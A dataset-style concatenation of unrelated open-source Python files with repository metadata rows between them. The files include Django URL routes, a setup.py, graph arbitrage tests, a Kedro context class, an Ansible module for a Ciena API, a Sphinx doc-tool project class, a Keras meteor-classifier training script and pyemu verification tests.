if __name__ == '__main__':
main()
| 17.388889
| 105
| 0.597444
|
4a11191cc78b9f390ebed5f50ec6a3bc064d0ce3
| 492
|
py
|
Python
|
rdmo/questions/urls/__init__.py
|
Raspeanut/rdmo
|
9f785010a499c372a2f8368ccf76d2ea4150adcb
|
[
"Apache-2.0"
] | null | null | null |
rdmo/questions/urls/__init__.py
|
Raspeanut/rdmo
|
9f785010a499c372a2f8368ccf76d2ea4150adcb
|
[
"Apache-2.0"
] | null | null | null |
rdmo/questions/urls/__init__.py
|
Raspeanut/rdmo
|
9f785010a499c372a2f8368ccf76d2ea4150adcb
|
[
"Apache-2.0"
] | null | null | null |
from django.urls import include, re_path
from rest_framework import routers
from ..views import CatalogExportView, CatalogImportXMLView, CatalogsView
urlpatterns = [
re_path(r'^catalogs/(?P<pk>[0-9]+)/export/(?P<format>[a-z]+)/$', CatalogExportView.as_view(), name='questions_catalog_export'),
re_path(r'^catalogs/import/(?P<format>[a-z]+)/$', CatalogImportXMLView.as_view(), name='questions_catalog_import'),
re_path(r'^catalogs/', CatalogsView.as_view(), name='catalogs'),
]
| 41
| 131
| 0.73374
|
4a111b23d0a976b761ae69f036294d2cf749efb9
| 162
|
py
|
Python
|
eurofx/__init__.py
|
supercoderz/pyeurofx
|
3f579bb6e4836dadb187df8c74a9d186ae7e39e7
|
[
"MIT"
] | 2
|
2018-07-14T11:58:35.000Z
|
2018-11-19T22:47:58.000Z
|
eurofx/__init__.py
|
supercoderz/pyeurofx
|
3f579bb6e4836dadb187df8c74a9d186ae7e39e7
|
[
"MIT"
] | null | null | null |
eurofx/__init__.py
|
supercoderz/pyeurofx
|
3f579bb6e4836dadb187df8c74a9d186ae7e39e7
|
[
"MIT"
] | 2
|
2017-01-03T11:50:45.000Z
|
2019-11-01T14:33:40.000Z
|
from .eurofx import get_historical_data,get_daily_data,get_currency_list
from .eurofx_pandas import get_historical_data_df,get_daily_data_df,get_currency_list_df
| 54
| 88
| 0.91358
|
4a111b56d327d182f51f5b9197073fba275d6f32
| 412
|
py
|
Python
|
setup.py
|
esupoff/astor
|
5c52bc2685793cef876acd95fa0aacca3c95ca3f
|
[
"BSD-3-Clause"
] | 1
|
2021-07-07T09:05:57.000Z
|
2021-07-07T09:05:57.000Z
|
setup.py
|
esupoff/astor
|
5c52bc2685793cef876acd95fa0aacca3c95ca3f
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
esupoff/astor
|
5c52bc2685793cef876acd95fa0aacca3c95ca3f
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import sys
from setuptools import setup
from setuptools.config import read_configuration
from setuputils import find_version
def here(*paths):
return os.path.join(os.path.dirname(__file__), *paths)
config = read_configuration(here('setup.cfg'))
config['metadata']['version'] = find_version(here('astor', '__init__.py'))
config['options'].update(config['metadata'])
setup(**config['options'])
| 22.888889
| 74
| 0.754854
|
4a111caf55597e56c7d387d6a2d92cdf594238ea
| 3,439
|
py
|
Python
|
peregrinearb/tests/bellmannx_test.py
|
lyn716/peregrine
|
5b1f6a839bf4a86198ad85f527b04b9a34ea7ab9
|
[
"MIT"
] | null | null | null |
peregrinearb/tests/bellmannx_test.py
|
lyn716/peregrine
|
5b1f6a839bf4a86198ad85f527b04b9a34ea7ab9
|
[
"MIT"
] | null | null | null |
peregrinearb/tests/bellmannx_test.py
|
lyn716/peregrine
|
5b1f6a839bf4a86198ad85f527b04b9a34ea7ab9
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from peregrinearb import bellman_ford_multi, multi_digraph_from_json, multi_digraph_from_dict, \
calculate_profit_ratio_for_path, bellman_ford
import json
import networkx as nx
def graph_from_dict(graph_dict):
if 'graph_type' not in graph_dict:
raise ValueError('graph_dict must contain key "graph_type"')
if graph_dict['graph_type'] == 'MultiDiGraph':
return multi_digraph_from_dict(graph_dict['graph_dict'])
elif graph_dict['graph_type'] == 'MultiGraph':
return nx.from_dict_of_dicts(graph_dict['graph_dict'], multigraph_input=True)
elif graph_dict['graph_type'] == 'DiGraph':
return nx.from_dict_of_dicts(graph_dict['graph_dict'])
elif graph_dict['graph_type'] == 'Graph':
return nx.from_dict_of_dicts(graph_dict['graph_dict'])
elif graph_dict['graph_type'] == 'other':
return nx.from_dict_of_dicts(graph_dict['graph_dict'])
else:
raise ValueError("the value for 'graph_type' in graph_dict is not of the accepted values.")
def digraph_from_multi_graph_json(file_name):
"""
file_name should hold a JSON which represents a MultiDigraph where there is a maximum of two edges each in opposing
directions between each node
:param file_name:
"""
with open(file_name) as f:
data = json.load(f)
G = nx.DiGraph()
for node in data.keys():
neighbors = data[node]
for neighbor, v in neighbors.items():
for key, data_dict in v.items():
G.add_edge(node, neighbor, **data_dict)
return G
class TestBellmanFordMultiGraph(TestCase):
def test_path_beginning_equals_end(self):
graph = multi_digraph_from_json('test_multigraph.json')
for node in graph:
new_graph, paths = bellman_ford_multi(graph, node)
for path in paths:
if path:
self.assertEqual(path[0], path[-1])
def test_positive_ratio(self):
graph = multi_digraph_from_json('test_multigraph.json')
for node in graph:
new_graph, paths = bellman_ford_multi(graph, node)
for path in paths:
if path:
# assert that the path is a negative weight cycle
ratio = calculate_profit_ratio_for_path(new_graph, path)
# python float precision may round some numbers to 1.0.
self.assertGreaterEqual(ratio, 1.0)
def test_loop_from_source(self):
graph = multi_digraph_from_json('test_multigraph.json')
for node in graph:
new_graph, paths = bellman_ford_multi(graph, node, loop_from_source=True)
for path in paths:
if path:
self.assertEqual(path[0], path[-1])
self.assertEqual(node, path[0])
class TestBellmannx(TestCase):
def test_ensure_profit_yields_profit(self):
graph = nx.DiGraph()
graph.add_edge(0, 1, weight=4)
graph.add_edge(1, 0, weight=3)
graph.add_edge(1, 2, weight=-1)
graph.add_edge(2, 3, weight=-1)
graph.add_edge(3, 1, weight=-1)
paths = bellman_ford(graph, 0, loop_from_source=True, ensure_profit=True)
for path in paths:
weight = 0
for i in range(len(path) - 1):
weight += graph[path[i]][path[i + 1]]['weight']
self.assertLess(weight, 0)
| 36.978495
| 119
| 0.640012
|
4a111ce8c93b72da44f8e7357a247203f33c7d73
| 1,102
|
py
|
Python
|
src/pipelinex/framework/context/pipelines_in_parameters_context.py
|
Lap1n/pipelinex
|
aed47be7fd27618e345d34217e199d3795153add
|
[
"Apache-2.0"
] | null | null | null |
src/pipelinex/framework/context/pipelines_in_parameters_context.py
|
Lap1n/pipelinex
|
aed47be7fd27618e345d34217e199d3795153add
|
[
"Apache-2.0"
] | null | null | null |
src/pipelinex/framework/context/pipelines_in_parameters_context.py
|
Lap1n/pipelinex
|
aed47be7fd27618e345d34217e199d3795153add
|
[
"Apache-2.0"
] | null | null | null |
from typing import Dict # NOQA
from kedro.pipeline import Pipeline # NOQA
from importlib import import_module
from .hatch_parameters_context import HatchParametersContext
from .hooks_in_parameters_context import HooksInParametersContext
class PipelinesInParametersContext(HatchParametersContext, HooksInParametersContext):
def _get_pipelines(self) -> Dict[str, Pipeline]:
parameters = self.catalog._data_sets["parameters"].load()
import_modules(parameters.get("IMPORT"))
pipelines = parameters.get("PIPELINES")
assert pipelines
return pipelines
def run(self, *args, **kwargs):
parameters = self.catalog._data_sets["parameters"].load()
run_dict = parameters.get("RUN_CONFIG", dict())
run_dict.update(kwargs)
return super().run(*args, **run_dict)
def import_modules(modules=None):
if modules:
if not isinstance(modules, list):
modules = [modules]
for module in modules:
assert isinstance(module, str), "'{}' is not string.".format(module)
import_module(module)
| 36.733333
| 85
| 0.69873
|
4a111d1bf64e336ba2f0599f53c13a3d8343e481
| 4,184
|
py
|
Python
|
plugins/modules/nsi_api_v1_search_fres_by_freid.py
|
ciena/ciena.mcp
|
b266a7cbd912c547f6e4877597d67ea9254e5758
|
[
"Apache-2.0"
] | 3
|
2021-07-19T23:56:34.000Z
|
2021-11-08T14:23:53.000Z
|
plugins/modules/nsi_api_v1_search_fres_by_freid.py
|
ciena/ciena.mcp
|
b266a7cbd912c547f6e4877597d67ea9254e5758
|
[
"Apache-2.0"
] | 1
|
2022-01-19T22:06:49.000Z
|
2022-01-24T15:16:53.000Z
|
plugins/modules/nsi_api_v1_search_fres_by_freid.py
|
ciena/ciena.mcp
|
b266a7cbd912c547f6e4877597d67ea9254e5758
|
[
"Apache-2.0"
] | 1
|
2021-11-08T14:25:29.000Z
|
2021-11-08T14:25:29.000Z
|
#!/usr/bin/env python
# Info module template
#############################################
# WARNING #
#############################################
#
# This file is auto generated by
# https://github.com/jgroom33/vmware_rest_code_generator
#
# Do not edit this file manually.
#
# Changes should be made in the swagger used to
# generate this file or in the generator
#
#############################################
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import socket
import json
DOCUMENTATION = """
module: nsi_api_v1_search_fres_by_freid
short_description: Handle resource of type nsi_api_v1_search_fres_by_freid
description: Handle resource of type nsi_api_v1_search_fres_by_freid
options:
fields:
description:
- (Optional) List of comma separated fields to be included in the response. Fields
require full path (i.e. data.attributes.field)
- Used by I(state=['get'])
type: str
freId:
description:
- Identifier of the FRE to be retrieved
- Required with I(state=['get'])
- Used by I(state=['get'])
type: str
include:
description:
- '(Optional) List of comma separated resources to be side-loaded. The allowed
values are: fres, tpes, networkConstructs, equipment, expectations, frePlanned,
freDiscovered, abstracts, controllers'
- Used by I(state=['get'])
type: str
state:
choices:
- get
description: []
type: str
author: []
version_added: 1.0.0
requirements:
- python >= 3.6
"""
IN_QUERY_PARAMETER = ["fields", "include"]
from ansible.module_utils.basic import env_fallback
try:
from ansible_module.turbo.module import AnsibleTurboModule as AnsibleModule
except ImportError:
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.ciena.mcp.plugins.module_utils.mcp import (
gen_args,
open_session,
update_changed_flag,
)
def prepare_argument_spec():
argument_spec = {
"mcp_hostname": dict(
type="str", required=False, fallback=(env_fallback, ["MCP_HOST"])
),
"mcp_username": dict(
type="str", required=False, fallback=(env_fallback, ["MCP_USER"])
),
"mcp_password": dict(
type="str",
required=False,
no_log=True,
fallback=(env_fallback, ["MCP_PASSWORD"]),
),
}
argument_spec["state"] = {"type": "str", "choices": ["get"]}
argument_spec["include"] = {"type": "str", "operationIds": ["get"]}
argument_spec["freId"] = {"type": "str", "operationIds": ["get"]}
argument_spec["fields"] = {"type": "str", "operationIds": ["get"]}
return argument_spec
async def main():
module_args = prepare_argument_spec()
module = AnsibleModule(argument_spec=module_args, supports_check_mode=True)
session = await open_session(
mcp_hostname=module.params["mcp_hostname"],
mcp_username=module.params["mcp_username"],
mcp_password=module.params["mcp_password"],
)
result = await entry_point(module, session)
module.exit_json(**result)
def url(params):
return "https://{mcp_hostname}/nsi/api/v1/search/fres/{freId}".format(**params)
async def entry_point(module, session):
func = globals()[("_" + module.params["state"])]
return await func(module.params, session)
async def _get(params, session):
_url = "https://{mcp_hostname}/nsi/api/v1/search/fres/{freId}".format(
**params
) + gen_args(params, IN_QUERY_PARAMETER)
async with session.get(_url) as resp:
content_types = [
"application/json-patch+json",
"application/vnd.api+json",
"application/json",
]
try:
if resp.headers["Content-Type"] in content_types:
_json = await resp.json()
else:
print("response Content-Type not supported")
except KeyError:
_json = {}
return await update_changed_flag(_json, resp.status, "get")
if __name__ == "__main__":
import asyncio
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
| 29.885714
| 86
| 0.633604
|
4a111d490237911f0a8aa3b8aa9e18648f3da215
| 16,823
|
py
|
Python
|
doctool/partials.py
|
nam4dev/doctool
|
8b161fd099165e66862a45e56d21ff27bf521766
|
[
"MIT"
] | null | null | null |
doctool/partials.py
|
nam4dev/doctool
|
8b161fd099165e66862a45e56d21ff27bf521766
|
[
"MIT"
] | null | null | null |
doctool/partials.py
|
nam4dev/doctool
|
8b161fd099165e66862a45e56d21ff27bf521766
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = "Namgyal BRISSON (nam4dev)"
__since__ = "10/25/2019"
__copyright__ = """MIT License
Copyright (c) 2019 Namgyal Brisson
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
"""
:summary: Defines a Partial Class to group Project (RST & API) common logic
"""
import os
import abc
import logging
from doctool import settings
from doctool.helpers import Types
from doctool.helpers import ProjectHelper
from doctool.interfaces import IProject
from doctool.interfaces import IManager
logger = logging.getLogger(__name__)
class PartialProject(IProject):
"""
Partial Project Class
Abstract methods:
* setup : Must be implemented to treat all prerequisites.
* build : Must be implemented to execute building process.
* teardown : Must be implemented to ensure all execution process remains clean.
Methods:
* __getattribute__ : Append logical repo path to relative path stored in the configuration file, if so.
Properties:
* configuration : The global configuration dict read from the configuration file by the Manager Class.
* id : The Unique Identifier for the project.
* rank : The rank of the project if Mode MULTIPLE *
* toctree : The project global "Table Of Content Tree" reference
* manager : The Manager instance
* helper : The Helper instance **
* src_dirname : The Project source directory path ***
* out_dirname : The final output directory path held by the Manager Class
* data : A selection of data used for writing project's specification (conf.py)
and running the underlying engine, Sphinx
* : The ranking is active only if more than one project is to be built.
** : The Helper instance is either a ProjectHelper or a CodeProjectHelper instance.
*** : The building process is done in a temporary folder not the real source directory path.
"""
__metaclass__ = abc.ABCMeta
def __getattribute__(self, attr):
"""
Override.
By applying a naming convention to some attributes, those would be automatically concatenated to
The Documentation Base Source Directory.
:param attr: The Attribute name to be looked up in the __dict__ instance.
:type attr: str
:return: The Associated value
:rtype: object
"""
returned = None
default = super(IProject, self).__getattribute__(attr)
if attr.startswith('_dir'):
possible_path = self.helper.absjoin(settings.REPO_BASE, default)
if os.path.exists(possible_path):
returned = possible_path
else:
returned = default
# FIXME: Seems not to be used anymore?!
# elif attr.startswith('_set'):
# returned = set()
# for p in attr:
# possible_path = self.helper.absjoin(settings.REPO_BASE, p)
# if os.path.exists(possible_path):
# returned.add(possible_path)
# else:
# returned.add(p)
return returned or default
def __str__(self):
string = u''
for attr, value in self.__dict__.items():
if not attr.startswith('__'):
string += u'{0} : {1}\n'.format(attr, value)
return string
__repr__ = __str__
def __init__(self, manager, configuration):
"""
Constructor
:param manager: The ProjectManager instance
:type manager: ProjectManager
:param configuration: The Project Configuration data
:type configuration: dict
"""
# Asserting we passe a Manager instance which respect the Interface Contract
assert issubclass(manager.__class__, IManager), ("You must pass in a derived Class instance "
"from IManager Interface")
# Keeping a reference on the Manager instance.
self._manager = manager
# The project Configuration dictionary
# self._configuration = Types.AttributeDict(configuration)
self._configuration = self.load(configuration)
# Pre routines are python routines to be executed before running sphinx builder
self._pre_routines = self._configuration.get('pre_routines') or []
# Post routines are python routines to be executed before running sphinx builder
self._post_routines = self._configuration.get('post_routines') or []
# The project is the home page and it should appear in the navigation bar)?
self.nav = self._configuration.get('nav', False)
# The project is the home page?
self.home = self._configuration.get('home', False)
# Allow to display or hide left/right menu
self.menu = self._configuration.get('menu', {"left": True, "right": True})
# Is this project included in the search bar
self.search = self._configuration.get('search', True)
# The maximum depth for Toc tree recursion (default to 3)
# lower-cased `maxdepth` is the project-level key, whereas upper-cased one is the global-level.
self._maxdepth = self._configuration.get('maxdepth', self._configuration.get('MAXDEPTH', 3))
# Optional project's icon
self.icon = self._configuration.get('icon')
# Optional project's layout
# Possible values:
# - 3-columns
# - 2-columns-left
# - 2-columns-right
self.layout = self._configuration.get('layout')
# The project Unique Identifier
self._uid = self._configuration.get('id', self._default_uid)
# The project's name (from Configuration file)
self._name = self._configuration.name
# The project output format {HTML, PDF, WORD, ...} received from the Commandline
self._output_format = manager.output_format
# The project Ranking index
self._rank = self._configuration.rank
# The project source directory
self._dir_source = self._configuration.dir2parse
# The Project's extra paths to be appended to the module `sys.path`
extra_paths = []
for path in self._configuration.get('extra_sys_paths') or []:
if not os.path.isabs(path):
path = ProjectHelper.absjoin(self._dir_source, path)
if os.path.exists(path):
extra_paths.append(path)
else:
logger.warning('Extra sys path %s does not exist!', path)
self._extra_paths = extra_paths
# The Project's HTML static paths to be appended to the `html_static_path` var in the conf.py file
self._html_static_paths = self._configuration.get('html_static_paths') or []
# The Project's metadata (theme, title, copyright, ...
self._metadata = self._configuration.metadata
# The Project's Type
self._is_api = self._configuration.api
# The Project's suffix for ReSt file(s) {rst|rest|...}
self._suffix = self._configuration.get('suffix', 'rst')
# The Project's suffix for ReSt file(s) {rst|rest|...}
self._override = self._configuration.get('override', True)
# The Project TOC tree mapping
self._toctree = None
# The Project TOC first valid link
self._first_link = ""
# Public attribute for Theme Support
self.theme = manager.theme
@property
def _default_uid(self):
"""
Property computing based on path to parse
the Project's UID
:rtype: str
:return: The project's UID
"""
dir2parse = self.helper.normpath(
self._configuration.dir2parse
).replace('/', ' ').strip()
return self.helper.slugify(dir2parse)
@property
def configuration(self):
"""
Holds the project's configuration Types.AttributeDict
:return: the project's configuration
:rtype: Types.AttributeDict
"""
return self._configuration
@property
def pre_routines(self):
"""
Property computing pre routine paths
:return: Computed pre routine paths
:rtype: list
"""
pre_routines = []
for routine in self._pre_routines:
if not os.path.isabs(routine):
pre_routines.append(
os.path.abspath(os.path.join(self.src_dirname, routine))
)
else:
pre_routines.append(routine)
return pre_routines
@property
def post_routines(self):
"""
Property computing post routine paths
:return: Computed post routine paths
:rtype: list
"""
post_routines = []
for routine in self._post_routines:
if not os.path.isabs(routine):
post_routines.append(
os.path.abspath(os.path.join(self.src_dirname, routine))
)
else:
post_routines.append(routine)
return post_routines
@property
def dryrun(self):
"""
If set the whole process is run without any physical action on the disk
:return: Whether or not the process must be run "dry" or not
:rtype: bool
"""
return self._configuration.get('dry_run', False)
@property
def maxdepth(self):
"""
The maximum depth for Toc tree recursion (default to 3)
:rtype: int
:return: maximum depth
"""
return self._maxdepth
@property
def is_api(self):
"""
Holds the project's type
:return: Whether or not the project is of API type
:rtype: bool
"""
return self._is_api
@property
def name(self):
"""
Holds the project's Name string
:return: the project's Name string
:rtype: str
"""
return self._name
@property
def slug(self):
"""
Holds the project's Name string as a slug
:return: the project's Name' Slug string
:rtype: str
"""
return self.helper.slugify(self.name)
@property
def id(self):
"""
Holds the project's UID string
:return: the project's UID string
:rtype: str
"""
return self._uid
@property
def suffix(self):
"""
Holds the project's for ReSt file(s) extension
:return: the project's ReSt file(s) extension
:rtype: str
"""
return self._suffix
@property
def override(self):
"""
Holds whether project's generation file(s) must be override or not
:return: the project's override condition
:rtype: bool
"""
return self._override
@property
def rank(self):
"""
Holds the project's Rank integer
:return: the project's Rank integer
:rtype: int
"""
return self._rank
@property
def extra_paths(self):
"""
Holds the Project's Extra Paths to be appended to the `sys.path` module
:return: the project's Extra Paths
:rtype: list
"""
return self._extra_paths
@property
def html_static_paths(self):
"""
Holds the Project's HTML static Paths
to be appended to the `html_static_path` var in the conf.py file
:rtype: list
:return: the project's HTML static Paths
"""
return self._html_static_paths
@property
def metadata(self):
"""
Holds the project's Metadata
:return: the project's Metadata
:rtype: Types.AttributeDict
"""
return Types.AttributeDict(self._metadata)
@property
def toctree(self):
"""
Holds the project's Table of contents (TOC) tree
:return: A dictionary containing all mapped links and
its associated values tuple(abspath, relpath)
:rtype: Types.AttributeDict
"""
return self._toctree
@property
def first_link(self):
"""
Holds the project's TOC tree first valid link
:return: the project's TOC tree first valid link
:rtype: str
"""
return self._first_link
@property
def manager(self):
"""
Wraps Main Manager instance into a clearer self property if needed
:return: IManager subclass instance
:rtype: ProjectManager
"""
return self._manager
@property
def helper(self):
"""
Wraps Main Manager Helper instance into a clearer self property if needed
:return: ProjectHelper instance
"""
return self._manager.helper
@property
def src_dirname(self):
"""
Abstract property
Should implement a way to retrieve the project's source dirname
:return: The Project's source dirname
:rtype: str
"""
assert os.path.exists(self._dir_source), "The Base directory does NOT exists ! ({0})".format(self._dir_source)
assert os.path.isdir(self._dir_source), "The Base directory is NOT a directory ! ({0})".format(self._dir_source)
return self.helper.normpath(self._dir_source)
@property
def data(self):
"""
Export this instance as a dictionary
:return: Self as a dictionary minus some non-useful attributes
:rtype: Types.AttributeDict
"""
return self.manager.data_context_builder(
uid=self.id,
project_name=self.name,
master_doc='index',
output_dir=self.helper.absjoin(self.manager.output_dir, self.id),
source_dir=self.src_dirname,
output_format=self._output_format,
extra_paths=self.extra_paths,
html_static_paths=self.html_static_paths,
metadata=self.metadata,
theme=self.theme
)
@property
def conf_filename(self):
"""
Property holding the Configuration filename
Typically the `conf.py` for Sphinx
:return: The Configuration filename
:rtype: str or unicode
"""
return self.helper.absjoin(self.src_dirname, 'conf.py')
def build_toctree(self, source_dir):
"""
Builds the Project's Toctree according the context
:param source_dir: The source directory
"""
self._toctree = []
index = self.helper.absjoin(source_dir, 'index.rst')
if os.path.isfile(index):
with open(index, 'r') as handle:
index_lines = handle.readlines()
toctree = Types.TOCList(
index_lines,
maxdepth=self.maxdepth,
src_dirname=source_dir,
suffix=self.id
)
self._toctree = toctree.build().items
self._first_link = toctree.first_link
@classmethod
def load(cls, configuration):
"""
Loads from filesystem the configuration file into memory.
:param configuration: The Configuration minimal data got from the global Configuration file.
:type configuration: dict
:return: The configuration data
:rtype: Types.AttributeDict
"""
return ProjectHelper.load_from_file(configuration)
@abc.abstractmethod
def setup(self):
"""
Abstract Method
The building process
"""
@abc.abstractmethod
def build(self):
"""
Abstract Method
The building process
"""
@abc.abstractmethod
def teardown(self):
"""
Abstract Method
The building process
"""
| 31.801512
| 120
| 0.616656
|
4a111d8595893cedd6547bd4eab5f0bd3c559494
| 6,264
|
py
|
Python
|
results/results_2/model_2_07/results_2_07_code.py
|
ibrahimoa/meteor_classification
|
4f6267944562f81546bf5fd5e7a5f568bd2e24a5
|
[
"CC0-1.0"
] | null | null | null |
results/results_2/model_2_07/results_2_07_code.py
|
ibrahimoa/meteor_classification
|
4f6267944562f81546bf5fd5e7a5f568bd2e24a5
|
[
"CC0-1.0"
] | 2
|
2021-06-07T10:14:07.000Z
|
2021-06-18T15:12:49.000Z
|
results/results_2/model_2_07/results_2_07_code.py
|
ibrahimoa/meteor_classification
|
4f6267944562f81546bf5fd5e7a5f568bd2e24a5
|
[
"CC0-1.0"
] | null | null | null |
import tensorflow as tf
from tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import Callback
import numpy as np
import matplotlib.pyplot as plt
from os.path import join
from os import listdir
import multiprocessing
from performanceMeasure import getPerformanceMeasures, plotAccuracyAndLoss
def trainCNN( ):
tf.keras.backend.clear_session()
modelNumber = 'model_2_07'
base_dir = 'C:\work_dir\meteorData\extraData_70_30'
results_dir = join('G:\GIEyA\TFG\meteor_classification\\results_2', modelNumber)
results_dir_weights = join(results_dir, 'weights')
train_dir = join(base_dir, 'train')
validation_dir = join(base_dir, 'validation')
ImageResolution = (432, 432)
ImageResolutionGrayScale = (432, 432, 1)
# Training -> 62483 (3905x16)
# Validation -> 26780 (1673x16)
training_images = len(listdir(join(train_dir, 'meteors'))) + len(listdir(join(train_dir, 'non_meteors')))
validation_images = len(listdir(join(validation_dir, 'meteors'))) + len(listdir(join(validation_dir, 'non_meteors')))
batch_size = 20
steps_per_epoch = int(training_images / batch_size)
validation_steps = int(validation_images / batch_size)
#Rescale all images by 1./255
train_datagen = ImageDataGenerator(rescale=1.0/255)
validation_datagen = ImageDataGenerator(rescale=1.0/255.)
train_generator = train_datagen.flow_from_directory(train_dir,
batch_size=batch_size,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
validation_generator = validation_datagen.flow_from_directory(validation_dir,
batch_size=batch_size,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
# elu activation vs relu activation -> model_2_02 and model_2_03
# dropout evaluation: model_2_02 (dropout .3) vs model_2_06 (no dropout) vs model_2_07 (dropout .4):
model = tf.keras.models.Sequential([
Conv2D(16, (7, 7), activation='elu', input_shape=ImageResolutionGrayScale, strides=1),
Conv2D(16, (7, 7), activation='elu', input_shape=ImageResolutionGrayScale, strides=1),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Conv2D(12, (5, 5), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (5, 5), activation='elu', kernel_initializer='he_uniform'),
Conv2D(12, (5, 5), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Conv2D(12, (5, 5), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (5, 5), activation='elu', kernel_initializer='he_uniform'),
Conv2D(12, (5, 5), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(32, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.40),
Flatten(),
Dense(864, activation='elu', kernel_initializer='he_uniform'),
Dropout(0.40),
Dense(16, activation='elu', kernel_initializer='he_uniform'),
Dropout(0.30),
Dense(1, activation='sigmoid', kernel_initializer='he_uniform')
])
print(model.summary())
optimizer = Adam(learning_rate=5e-4)
model.compile(optimizer=optimizer,
loss='binary_crossentropy',
metrics=['accuracy'])
class SaveModelCallback(Callback):
def __init__(self, thresholdTrain, thresholdValid):
super(SaveModelCallback, self).__init__()
self.thresholdTrain = thresholdTrain
self.thresholdValid = thresholdValid
def on_epoch_end(self, epoch, logs=None):
if((logs.get('accuracy') >= self.thresholdTrain) and (logs.get('val_accuracy') >= self.thresholdValid)):
model.save_weights(join(results_dir_weights, modelNumber + '_acc_' + str(logs.get('accuracy'))[0:5]
+ '_val_acc_' + str(logs.get('val_accuracy'))[0:5] + '.h5'), save_format='h5')
callback_84_84 = SaveModelCallback(0.840, 0.840)
history = model.fit(train_generator,
validation_data=validation_generator,
steps_per_epoch=steps_per_epoch,
epochs=15, #Later train with more epochs if neccessary
validation_steps=validation_steps,
shuffle=True,
verbose=1,
callbacks=[callback_84_84])
################################# PRINT MODEL PERFORMANCE AND GET PERFORMANCE MEASURES #################################
# Get performance measures:
getPerformanceMeasures(model, validation_dir, ImageResolution, join(results_dir, 'performance_' + modelNumber + '.txt'), threshold=0.50)
# Plot Accuracy and Loss in both train and validation sets
plotAccuracyAndLoss(history)
#########################################################################################################################
if __name__ == '__main__':
p = multiprocessing.Process(target=trainCNN)
p.start()
p.join()
| 45.064748
| 140
| 0.600415
|
4a111d88e55122bbcf43fed6eee83481d4aba946
| 4,895
|
py
|
Python
|
autotest/verf_test.py
|
hwreeves-USGS/pyemu
|
6b443601fbb9bcb9e97a8c200a78480c11c51f22
|
[
"BSD-3-Clause"
] | 94
|
2015-01-09T14:19:47.000Z
|
2022-03-14T18:42:23.000Z
|
autotest/verf_test.py
|
hwreeves-USGS/pyemu
|
6b443601fbb9bcb9e97a8c200a78480c11c51f22
|
[
"BSD-3-Clause"
] | 184
|
2020-05-29T14:25:23.000Z
|
2022-03-29T04:01:42.000Z
|
autotest/verf_test.py
|
hwreeves-USGS/pyemu
|
6b443601fbb9bcb9e97a8c200a78480c11c51f22
|
[
"BSD-3-Clause"
] | 51
|
2015-01-14T15:55:11.000Z
|
2021-12-28T17:59:24.000Z
|
import os
import numpy as np
#import matplotlib.pyplot as plt
import pandas as pd
import pyemu
predictions = ["sw_gw_0","sw_gw_1","or28c05_0","or28c05_1"]
post_mat = os.path.join("verf_results","post.cov")
verf_dir = "verf_results"
ord_base = os.path.join(verf_dir,"freyberg_ord")
if not os.path.exists("temp"):
os.mkdir("temp")
def predunc7_test():
post_pd7 = pyemu.Cov.from_ascii(post_mat)
la_ord = pyemu.Schur(jco=ord_base+".jco",predictions=predictions)
post_pyemu = la_ord.posterior_parameter
delta_sum = np.abs((post_pd7 - post_pyemu).x).sum()
print("delta matrix sum: {0:15.6E}".format(delta_sum))
assert delta_sum < 1.0e-4
def predunc1_test():
la_ord = pyemu.Schur(jco=ord_base+".jco",predictions=predictions)
fsum = la_ord.get_forecast_summary()
fsum.loc[:,["prior_var","post_var"]] = fsum.loc[:,["prior_var","post_var"]].apply(np.sqrt)
# load the predunc1 results
pd1_results = pd.read_csv(os.path.join(verf_dir,"predunc1_results.dat"))
pd1_results.index = ["prior_var","post_var"]
for forecast_name in fsum.index:
pd1_pr,pd1_pt = pd1_results.loc[:,forecast_name]
pr,pt = fsum.loc[forecast_name,["prior_var","post_var"]].values
pr_diff = np.abs(pr - pd1_pr)
pt_diff = np.abs(pt - pd1_pt)
print("forecast:",forecast_name,"prior diff:{0:15.6E}".format(pr_diff),\
"post diff:{0:15.6E}".format(pt_diff))
assert pr_diff < 1.0e-3
